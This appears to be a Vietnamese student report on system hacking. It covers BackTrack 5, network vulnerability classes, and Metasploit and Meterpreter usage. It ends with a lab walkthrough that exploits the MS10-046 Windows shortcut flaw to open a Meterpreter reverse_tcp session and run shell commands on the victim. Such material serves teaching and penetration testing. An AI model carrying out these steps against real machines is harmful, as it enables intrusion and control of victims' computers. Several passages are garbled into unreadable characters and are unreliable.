Tải bản đầy đủ (.docx) (37 trang)

Đề tài tấn công hệ thống – system hacking

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.74 MB, 37 trang )

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Contents


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN





































ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA




NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN

























ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA















CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5
I. Giới thiệu
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtrack

trực tiếp từ đĩa DVD mà không cần cài nó vào máy của chúng ta. Backtrack cũng có
thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp
nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm - IWHAX,
WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên
phiên bản phân phối Linux Ubuntu 11.10. Tính đến ngày 19 tháng bảy năm 2010,
Backtrack 5 đã được tải về của hơn 1,5 triệu người sử dụng. Phiên bản mới nhất là
Backtrack 5 R2
II. Mục đích
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác
nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
(www.slax .

org)). Backtrack liên tục cập nhật các công cụ, drivers, hiện tại
Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là
sự kết hợp
giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và
Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử
nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack
5,0 có thể được phân loại như sau:
 Information gathering: loại này có chứa một số công cụ có thể được sử
dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa
chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được
thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào
môi trường mục tiêu.
 Network mapping: loại này chứa các công cụ có thể được sử dụng để
kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi

mục tiêu, và cũng làm portscanning.
 Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy
các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó
cũng chứa các công cụ để thực hiện và phân tích Server Message Block
(SMB) và Simple Network Management Protocol (SNMP).
 Web application analysis: loại này chứa các công cụ có thể được sử
dụng trong theo dõi, giám sát các ứng dụng web
  ! "#$%!&' "()* *+ ,- '  $& ./"0 '12"0 3)4 5(6#$!!$1 78
"19"/"0$:" *; 72 $6)<"=>?@A4B1C"0$ BD $1- *E F"0BGB B2"0 BF
$&!"0$1-(!/ "8)
 #"#$&H!"+(!/ "8)B1IBGBB2"0BFBD$1-JKLB*EF"0J-'1 $1GB
BGB(M1N"0$O.$1P)$&!"0BGB.G)Q"1.FBHR6
 & 7 (#0##*B($ !"+S6'1  '1  $1GB BGB (M 1N"078 JKLB $&6)B9T78!
BGB.G) $U"1 .FB HR64 B1C"0 $ BD $1- *E F"0 BGB B2"0 BF $&!"0 (!/
"8)J-"3"0B!JVBW6)X"BYB1C"0$B1!BGBJVBW6)X"B!"1P$
  "$ " "0 BB#**+ 2"0 BF $&!"0 (!/  "8) *Z BD $1- 0 CT B1C"0 $
$&!"07 [B6)$&OW6)X"$&6)B9T78!BGB.G)Q"1.FBHR61C"0$BD
$1-B:"J-BDJKLB"1\"0JVBW6)X"B!"1P$$&K]B'1 BGBB1C"0$BD
$1-B8 JV$B2"0BFJ-6)$&OW6)X"$&6)B9T
^

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
 _! B#7#&?=_?A+,-T13"QB1_?B1C"0$BD$1-*EF"0BGBB2"0
BF$&!"0$1-(!/ "8)
 @ 0 $(`!&#"* B*+&!"0(!/ "8)4B1C"0$BD$1-a.$1P).b$*;B2"0BF
BD$1-JKLB*EF"0J-(8.T13"QB1'c$169$"1KBDJKLB1O"1d"1Je
BI"04BP6$&CBBGB$9T$ "478T13"QB11O"1d"1JeBI"0,-*EF"0BGB
B2"0BFB6"0BPT$&!"0$1-(!/ "8)4B1C"0$BD$1-B1f"S$&$B'$&B'
>!&#"* B*$&!"0$&O"1Jg"'1h Jb"0,2 '1 *ZJi 1j B1C"0$T1d 0k"
'<$"b 5bJeBI"078BGB$9T$ "$&!JN $&!"0B1<JbB1lJfBJ-5d!$m"

Q"1$!8"7n"#7#&*##"0 "##& "0+1-(!/ "8)B1IBGBB2"0BFBD$1-
JKLB*EF"0J-
0o&; B1Kg"0$&O"1.b$1!VB$1G!&p .b$$9TH"$1qB
$1 
CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY
I. Giới thiệu
"" "1"$!8"./"0.G)$U"11!8"$!8"(87P"JXB!""0Kp 4!JD7 [BJK&
.b$18"1("0T1GT(r78BGBW6)"06)R"$kB(8.7 [BBF$1-(8B:"$1 <$sJ3)4
18"1("0T1GT(rBD$1-0m.+BGBJ X6'1!d"$&!"05b(69$BY"18"K]B4BGB7t"
5d"K]  (69$4 i" BGB W6) Ju"1 BD $1- ! $v"0 $N B1IB JV$ & B1! T1w 1LT
7] $v"0JVBJ & R"0GBW6)Ju"1BD$1-"1K+W6)Ju"17X"13"*q47 [B*EF"0
.G)4*EF"0T1:".X.4_8"1K79)4*Z1 [6W6d"1P$$&!"07 [BJd.5d!"" "1
"$!8" B1! 1[ $1;"0 ./"0 .G) Q"1 .b$ '1  $$1qB 1 [" $& [$J- 0 d  T1GT
7XB1U"1*GB1B!""0Kp D.(/ 47P"JX"" "1"$!8"./"0.G)$U"1(8.b$7P"
JX(]"4"D)R6B:6B:"T1d BD.b$0 d T1GT$N"0$1-4'12"0B1lT1:".X.4T1:"
BI"0.G)Q"1.8"DJi 1j Bd7P"JXB1U"1*GB17XB!""0Kp _87P"JX"8)B:"
T1d JKLB$1qB1 [".b$BGB1$1Kp"0x6)R"( R"$FB4'12"05!0 p$& [$J-JKLB7O
"D(62""d)* "1$1#!$1p 0 "6)"1 R"45y"0BGB0 d T1GT$N"0$1-1LT(r4JVB
5 [$(80 d  W6)<$ $;$ 7P" JX B1U"1 *GB1 7X B!" "0Kp  $ BD $1- $/! & B1! .O"1
*q "$!8"B1kBB1k"1g"
II. Vấn đề bảo mật hệ thống và mạng
 Các vấn dề chung về bảo mật hệ thống và mạng
Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng
chung và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử
z

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
dụng không hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính
đơn lẻ, hoặc mộtngười sử dụng.Hoạt động của người quản trị hệ thống mạng
phải đảm bảo các thông tin trên mạng là tin cậy và sử dụng đúng mục đích, đối

tượng đồng thời đảm bảo mạng hoạt động ổn định không bị tấn công bởi những kẻ
phá hoại. Nhưng trên thực tế là không một mạng nào đảm bảo là an toàn tuyệt đối,
một hệ thống dù được bảo vệ chắc chắn đến mức nào thì cũng có lúc bị vô hiệu hóa
bởi những kẻ có ý đồ xấu.
 Một số khái niệm và lịch sử bảo mật hệ thống
a) Đối tượng tấn công mạng (intruder)
Đối tượng là những cá nhân hoặc tổ chức sử dụng những kiến thức về
mạng và các công cụ phá hoại (gồm phần cứng hoặc phần mềm) để dò tìm các điểm
yếu và các lỗ hổng bảo mật trên hệ thống, thực hiện các hoạt động xâm nhập và
chiếm đoạt tài nguyên trái phép.Một số đối tượng tấn công mạng như:Hacker: là
những kẻ xâm nhập vào mạng trái phép bằng cách sử dụng các công cụ phá mật
khẩu hoặc khai thác các điểm yếu của thành phần truy nhập trên hệ thống
Masquerader : Là những
kẻ giả mạo thông tin trên mạng như giả mạo địa chỉ IP, tên miền, định danh người
dùng…Eavesdropping: Là những đối tượng nghe trộm thông tin trên mạng, sử
dụngcác công cụ Sniffer, sau đó dùng các công cụ phân tích và debug để lấy được
các thông tin có giá trị. Những đối tượng tấn công mạng có thể nhằm nhiều mục
đích khác nhau như ăn cắp các thông tin có giá trị về kinh tế, phá hoại hệ thống mạng
có chủ định, hoặc có thể đó là những hành động vô ý thức…
b) Các lỗ hổng bảo mật
Các lỗ hổng bảo mật là những điểm yếu trên hệ thống hoặc ẩn chứa trong một
dịch vụ mà dựa vào đó kẻ tấn công có thể xâm nhập trái phép vào hệ thống để thực
hiện những hành động phá hoại chiếm đoạt tài nguyên bất hợp pháp.Có nhiều
nguyên nhân gây ra những lỗ hổng bảo mật: có thể do lỗi của bản thân hệ thống, hoặc
phần mềm cung cấp hoặc người quản trị yếu kém không hiểu sâu về các dịch vụ cung
cấp…Mức độ ảnh hưởng của các lỗ hổng tới hệ thống là khác nhau. Có lỗ hổngchỉ
ảnh hưởng tới chất lượng dịch vụ cung cấp, có lỗ hổng ảnh hưởng tới toàn bộ hệ thống
hoặc phá hủy hệ thống
c) Chính sách bảo mật
{


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Chính sách bảo mật là tập hợp các quy tắc áp dụng cho những
người tham gia quản trị mạng, có sử dụng các tài nguyên và các dịch vụ mạng.
Đối với từng trường hợp phải có chính sách bảo mật khác nhau.
Chính sách bảo mật giúp người sử dụng biết trách nhiệm của mình trong việc bảo vệ
các tài nguyên trên mạng, đồng thời còn giúp cho nhà quản trị mạng thiết lập các
biên pháp đảm bảo hữu hiệu trong quá trình trang bị, cấu hình và kiểm soát hoạt
động của hệ thống và mạng.
 Các loại lỗ hổng bảo mật và phương thức tấn công mạng chủ yếu
a) Các loại lỗ hổng
Có nhiều các tổ chức đã tiến hành phân loại các dạng lỗ hổng đặc
biệt. Theo bộ quốc phòng Mỹ các loại lỗ hổng được phân làm ba loại như sau:
Lỗ hổng loại C
Cho phép thực hiện các hình thức tấn công theo DoS(Denial of Services- Từ
chối dịch vụ) Mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch vụ, làm
ngưng trệ, gián đoạn hệ thống, không làm phá hỏng dữ liệuhoặc đạt được quyền truy
cập bất hợp pháp.DoS là hình thức tấn công sử dụng các giao thức ở tầng Internet
trong bộ giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng từ chối
người sử dụng hợp pháp truy nhập hay sử dụng hệ thống.Các dịch vụ có lỗ hổng
cho phép các cuộc tấn công DoS có thể được nângcấp hoặc sửa chữa bằng các phiên
bản mới hơn của các nhàcung cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu
nào để khắc phục tình trạng tấn công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP)
nói riêng và bộ giao thức TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của
các lỗ hổng loại này.
Lỗ hổng loại B:
Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm
tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có
trong các ứng dụng trên hệ thống . Có mức độ nguy hiểm là trung bình.Lỗ hổng loại
B này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phép người sử dụng nội bộ có

thể chiếm được quyền cao hơn hoặc truy nhập không hợp pháp.
|

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ thống.
Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống với một
số quyền hạn nhất định. Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác của lỗ
hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương trình
viết bằng mã nguồn C thường sử dụng một vùng đệm, một vùng trong bộ nhớ sử
dụng để lưu trữ dữ liệu trước khi xử lý. Người lập trình thường sử dụng vùng đệm
trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví
dụ khi viết chương trình nhập trường tên người sử dụng quy định trường này dài 20
ký tự bằng khai báo:Char first_name [20]; Khai báo này cho phép người sử dụng
nhập tối đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi
người sử dụng nhập nhiều hơn 20 ký tự sẽ tràn vùng đệm. Những ký tự nhập thừa sẽ
nằm ngoàivùng đệm khiến ta không thể kiểm soát được. Nhưng đối với những kẻ tấn
côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để
thực thi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được
lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp
lệ.Để hạn chế được các lỗ hổng loại B phải
kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình.
Lỗ hổng loại A
Cho phép người ngoài hệ thống có thể truy cập bất hợp pháp vào hệ thống. Có
thể làm phá huỷ toàn bộ hệ thống. Loại lỗ hổng này có mức độ rất nguy hiểm đe dọa
tính toàn vẹn và bảo mật của hệ thống. Các lỗ hổng này thườngxuất hiện ở những hệ
thống quản trị yếu kém hoặc không kiểm soát được cấu hình mạng. Những lỗ hổng
loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phần mềm sử dụng, người
quản trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu
này. Vì vậy thường xuyên phải kiểm tra các thông báo của các nhóm tin về bảo mật
trên mạng để phát hiện những lỗ hổng loại này. Một loạt các chương trình phiên bản

cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail,
ARP, finger.
b) Các hình thức tấn công mạng phổ biến
Scanner
Scanner là một chương trình tự động rà soát và phát hiện những điểm yếu
về bảo mật trên một trạm làm việc cục bộ hoặc một trạm ở xa. Một kẻ phá hoại sử
dụng chương trình Scanner có thể phát hiện ra những lỗ hổng về bảo mật trên một
}

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Server dù ở xa.Cơ chế hoạt động là rà soát và phát hiện những cổng TCP/UDP được
sử dụng trên hệ thống cần tấn công và các dịch vụ sử dụng trên hệ thống đó. Scanner
ghi lại những đáp ứng trên hệ thống từ xa tương ứng với dịch vụ mà nó phát hiện ra.
Từ đó nó có thể tìm ra điêm yếu của hệ thống. Những yếu tố để một Scanner hoạt
động như sau : Yêu cầu thiết bị và hệ thống: Môi trường có hỗ trợ TCP/IP Hệ thống
phải kết nối vào mạng Internet.Các chương trình Scanner có vai trò quan trọng trong
một hệ thống bảo mật,vì chúng có khả năng phát hiện ra những điểm yếu kém trên
một hệ thống mạng.
Password Cracker
Là một chương trình có khả năng giải mã một mật khẩu đã được mã hoá hoặc
có thể vô hiệu hoá chức năng bảo vệ mật khẩu của một hệ thống.Một số chương trình
phá khoá có nguyên tắc hoạt động khác nhau. Một số chương trình tạo ra danh sách
các từ giới hạn, áp dụng một số thuật toán mã hoá từ kết quả so sánh với Password đã
mã hoá cần bẻ khoá để tạo ra một danh sách khác theo một logic của chương
trình.Khi thấy phù hợp với mật khẩu đã mã hoá, kẻ phá hoại đã có được mật khẩu
dưới dạng text . Mật khẩu text thông thường sẽ được ghi vào một file.Biện pháp
khắc phục đối với
cách thức phá hoại này là cần xây dựng mộtchính sách bảo vệ mật khẩu đúng đắn.
Sniffer
Sniffer là các công cụ (phần cứng hoặc phần mềm)”bắt ”các thông tin lưu

chuyển trên mạng và lấy các thông tin có giá trị trao đổi trên mạng.Sniffer có thể
“bắt” được các thông tin trao đổi giữa nhiều trạm làm việc với nhau. Thực hiện bắt
các gói tin từ tầng IP trở xuống. Giao thức ở tầng IP được định nghĩa công khai, và
cấu trúc các trường header rõ ràng, nên việc giải mã các gói tin này không khó khăn.
Mục đích của các chương trình sniffer đó là thiết lập chế độ
promiscuous(mode dùng chung) trên các card mạng ethernet - nơi các gói tin trao
đổi trong mạng - từ đó "bắt" được thông tin.Các thiết bị sniffer có thể bắt được toàn
bộ thông tin trao đổi trên mạng là dựa vào nguyên tắc broadcast (quảng bá) các gọi
tin trong mạng Ethernet.Tuy nhiên việc thiết lập một hệ thống sniffer không phải đơn
giản vì cần phải xâm nhập được vào hệ thống mạng đó và cài đặt các phần mềm
sniffer.Đồng thời các chương trình sniffer cũng yêu cầu người sử dụng phải hiểu sâu
về kiến trúc, các giao thức mạng.Việc phát hiện hệ thống bị sniffer không phải đơn
giản, vì sniffer hoạt động ở tầng rất thấp, và không ảnh hưởng tới các ứng dụng
cũng như các dịch vụ hệ thống đó cung cấp.Tuy nhiên việc xây dựng các biện
~

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
pháp hạn chế sniffer cũng không quá khó khăn nếu ta tuân thủ các nguyên tắc về
bảo mật như:
 Không cho người lạ truy nhập vào các thiết bị trên hệ thống

Quản lý cấu hình hệ thống chặt chẽ

Thiết lập các kết nối có tính bảo mật cao thông qua các cơ chế mã
hoá.
Trojans
Trojans là một chương trình chạy không hợp lệ trên một hệ thống. Với vai trò
như một chương trình hợp pháp. Trojans này có thể chạy được là do các chương
trình hợp pháp đã bị thay đổi mã của nó thành mã bất hợp pháp.Ví dụ như các
chương trình virus là loại điển hình của Trojans. Những chương trình virus thường

che dấu các đoạn mã trong các chương trình sử dụng hợp pháp. Khi những chương
trình này được kích hoạt thì những đoạn mã ẩn dấu sẽ thực thi và chúng thực hiện
một số chức năng mà người sử dụng không biết như: ăn cắp mật khẩu hoặc copy file
mà người sử dụng như ta thường không hay biết.Một chương trình Trojans sẽ thực
hiện một trong những công việc sau:
Thực hiện một vài chức năng hoặc giúp người lập trình lên nó phát hiện
những thông tin quan trọng hoặc những thông tin cá nhân trên một hệ thống hoặcchỉ
trên một vài thành phần của hệ thống đó.
Che dấu một vài chức năng hoặc là giúp người lập trình phát hiện những
thông tin quan trọng hoặc những thông tin cá nhân trên một hệ thống hoặc chỉ trên
một vài thành phần của hệ thống. Ngoài ra còn có các chương trình Trojan có thể
thực hiện đựợc cả hai chức năng này. Có chương trình Trojan còn có thể phá hủy hệ
thống bằng cách phá hoại các thông tin trên ổ cứng. Nhưng ngày nay các Trojans
kiểu này dễ dàng bị phát hiện và khó phát huy được tác dụng.Tuy nhiên có những
trường hợp nghiêm trọng hơn những kẻ tấn công tạo ra những lỗ hổng bảo mật thông
qua Trojans và kẻ tấn công lấy được quyền root trên hệ thống và lợi dụng quyền
đó để phá hủy một phần hoặc toàn bộ hệ thống hoặc dùng quyền root để thay đổi
logfile, cài đặt các chương trình trojans khác mà ngườiquản trị không thể phát
hiện được gây ra mức độ ảnh hưởng rất nghiêm trọng và người quản trị chỉ còn
cách cài đặt lại toàn bộ hệ thống.


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking
? Giới Thiệu Về Metasploit
 Giới Thiệu
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin
về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm
nhập và phát triển hệ thống phát hiện tấn công mạng. Một dự án
con rất nổi tiếng của Metasploit là Metasploit Framework.

Metasploit Framework là một môi trường dùng để kiểm tra ,tấn
công và khai thác lỗi của các service. Metasploit được xây dựng
từ ngôn ngữ hướng đối tượng Perl, với những components được
viết bằng C, assembler, và Python.Metasploit có thể chạy trên
hầu hết các hệ điều hành: Linux, Windows, MacOS
 Các Thành Phần Của Metasploit
Metasploit hỗ trợ nhiều giao diện với người dùng:
 Console interface: dùng lệnh msfconsole.
Msfconsole interface sử dụng các dòng lệnh để
cấu hình, kiểm tra nên nhanh hơn và mềm dẻo
hơn
 Web interface: dùng msfweb, giao tiếp với
người dùng thông qua giao diện web

Command line interface
: dùng msfcli
Enviroment:
 Global Enviroment:được thực thi thông qua 2
câu lệnh setg và unsetg, những options được
gán ở đây sẽ mang tính toàn cục, được đưa vào
tất cả các module exploits


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
 Temporary Enviroment: được thực thi thông
qua 2 câu lệnh set và unset, enviroment này chỉ
được đưa vào module exploit đang load hiện
tại, không ảnh hưởng đến các module exploit
khác
Chúng có thể lưu lại enviroment mình đã cấu hình

thông qua lệnh save. Môi trường đó sẽ được lưu
trong ./msf/config và sẽ được load trở lại khi user
interface được thực hiện
 Sử dụng Metasploit Framework
A Chọn module exploit
Lựa chọn chương trình, dịch vụ lỗi mà Metasploit
có hỗ trợ để khai thác
 show exploits: xem các module exploit mà
framework có hỗ trợ

use exploit_name
: chọn module exploit

info exploit_name
: xem thông tin về module
exploit
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ
cũng như các module trên www.metasploit.com hoặc
qua lệnh msfupdate hoặc svn update
/opt/metasploit/msf3/
5A Cấu hình module exploit đã chọn
 show options: Xác định những options nào cần
cấu hình.

set
: cấu hình cho những option của module đó


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Một vài module còn có những advanced options,

chúng ta có thể xem bằng cách gõ dòng lệnh show
advanceds
BA Verify những options vừa cấu hình
 check: kiểm tra xem những option đã được set
chính xác chưa.
A Lựa chọn target
Lựa chọn hệ diều hành nào để thực hiện
 show targets: những target được cung cấp bởi
module đó

set
: xác định target nào
vd: msf> use
auxiliary/dos/windows/rdp/ms12_020_maxchannelid
s
#A Lựa chọn payload
Payload là đoạn code mà sẽ chạy trên hệ thống
remote machine, là một phần của virus máy tính để
thực thi mã độc.
 show payloads: liệt kê ra những payload của
module exploit hiện tại


info payload_name: xem thông tin chi tiết về
payload đó

Set payload payload_name: xác định payload
module name.Sau khi
lựa chọn payload nào,
dùng lệnh show options để xem những options

của payload đó


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA


show advanced: xem những advanced options
của payload đó
`A Thực thi exploit


exploit: lệnh dùng để thực thi payload code.
Payload sau đó sẽ cung cấp cho chúng ta
những thông tin về hệ thống được khai thác
 Giới thiệu Payload Meterpreter
Meterpreter viết tắt từ Meta-Interpreter là một payload nâng
cao có trong Metasploit Framework. Mục đích của nó là để
cung cấp những tập lệnh để khai t
hác
tấn câng các máy remote
computers.Nó được viết từ các developers dưới dạng shared
object (DLL) files. Meterpreter và các thành phần mở rộng được
thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có
thể tránh được sự phát hiện từ các phần mềm chống virus.
Meterpreter cung cấp một tập lệnh để chúng ta có
thể khai thác trên cách remote computers:
 Fs(Filesystem): cung cấp quá trình tương tác
với filesystem

Net: cho phép xem thông tin mạng của remote

machine như IP, route table


Process:cho phép tạo tương tác với các tiến
trình trên remote machine


Sys: cho phép xem thông tin hệ thống, môi
trường của remote machine
A Sử dụng module Fs
 cd directory:giống lệnh cd của commandline,
chuyển thư mục làm việc
^

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
 getcwd: cho biết thư mục đang làm việc hiện
tại
 ls: liệt kê các thư mục và tập tin
 upload src1 [src2 ] dst: upload file từ src tới
dst.
 download src1 [src2 ] dst: download file từ
src tới dst.
5A Sử dụng module Net
 ipconfig: xem câu hình của card mạng của
máy tính từ xa
 route: xem bảng định tuyến của remote
machine
BA Sử dụng module Process
 execute -f file [ -a args ] [ -Hc ]:Câu lệnh
execute cho phép tạo ra một process mới

trên remote machine và sử dụng process đó
để khai thác dữ liệu
 kill pid1 pid2 pid3:huỷ hoặc tắt các process
đang chạy trên máy remote machine
 ps: liệt kê những process của remote
machine
A Sử dụng module Sys
 getuid: cho biết username hiện tại của remote
machine
z

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
 sysinfo: cho biết thông tin về máy tính nạn
nhân: hệ điều hành, phiên bản, nền tản 32bits
hay 64bits
^ Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như
để Metasploit không thể khai thác được lỗi Lsass_ms04_011,
chúng ta phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft
đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các
hệ điều hành windows. Chúng ta nên sử dụng hotfix có number là
835732 để vá lỗi trên.
?? Lỗi MS10-046 (2286198)
 Giới thiệu
Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell
cho tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công
chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn
từ xa. Lỗi này được phát hiện vào tháng 06/2010 và đến tháng
08/2010, Microsoft tung ba bản vá lỗi.
Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của

Windows, các tập tin này thường nằm ở giao diện desktop hay
trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem
tập tin shortcut hay nội dung của một thư mục chứa tập tin
shortcut nhúng mã độc.
Các bản Windows bị ảnh hưởng bao gồm
{

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
 Các bước tấn công
a. (mạng LAN)
 Khởi động Kali Linux và đăng nhập thành công ,
mở terminal ta được
|

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Ta gõ : msfconsole và enter
Để dùng mã lỗi ms10-046:search ms10-046 và enter
}

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Ta gõ tiếp: use
exploit/windows/browser/ms10_046_shortcut_icon_dllload
và enter
 Dùng Lệnh show options để xem các tham số cần
thiết để có thể tiến hành tấn công được:
o SRVHOST: địa chỉ máy của kẻ tấn công, để
lắng nghe có nạn nhân nào kết nối đến hay
không
o SRVPORT: cổng lắng nghe ,mặc định là

http(80)
~

ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
 Tiếp theo ta sẽ
o set payload windows/meterpreter/reverse_tcp
o set srvhost 192.168.181.128
o Set lhost địa chỉ ip:set lhost 192.168.181.128 .lhost
là tham số của payload mà ta vừa set ở trên
exploit để khởi động server lắng nghe trên máy tấn công


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải
chuột vào
Desktop -> New -> Shortcut
Ta gõ vào địa chỉ của máy tấn công vào Type the location of
the item:
http://192.168.1.35/anythingvà chọn Next


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Đặt tên cho shortcut vừa mới tạo và nhấn Finish. Ta sẽ mở
shortcut này:
Đợi một lát, trên máy tính tấn công ta được:


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Dùng lệnh sessions để xem các phiên làm việc mà Metasploit
đang có:

Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1
là id của sessions)
Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn
công đã điều khiển
được máy nạn nhân với toàn quyền. Ví dụ:


ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
Lệnh sysinfo để lấy thông tin của máy nạn nhân:
Lệnh rất hữu ích để sử dụng cmd (command-line): shell
Lấy ip victim qua cmd(dùng ipconfig) :
Xem các chương trình chạy trên máy victim (dùng tasklist):
^


×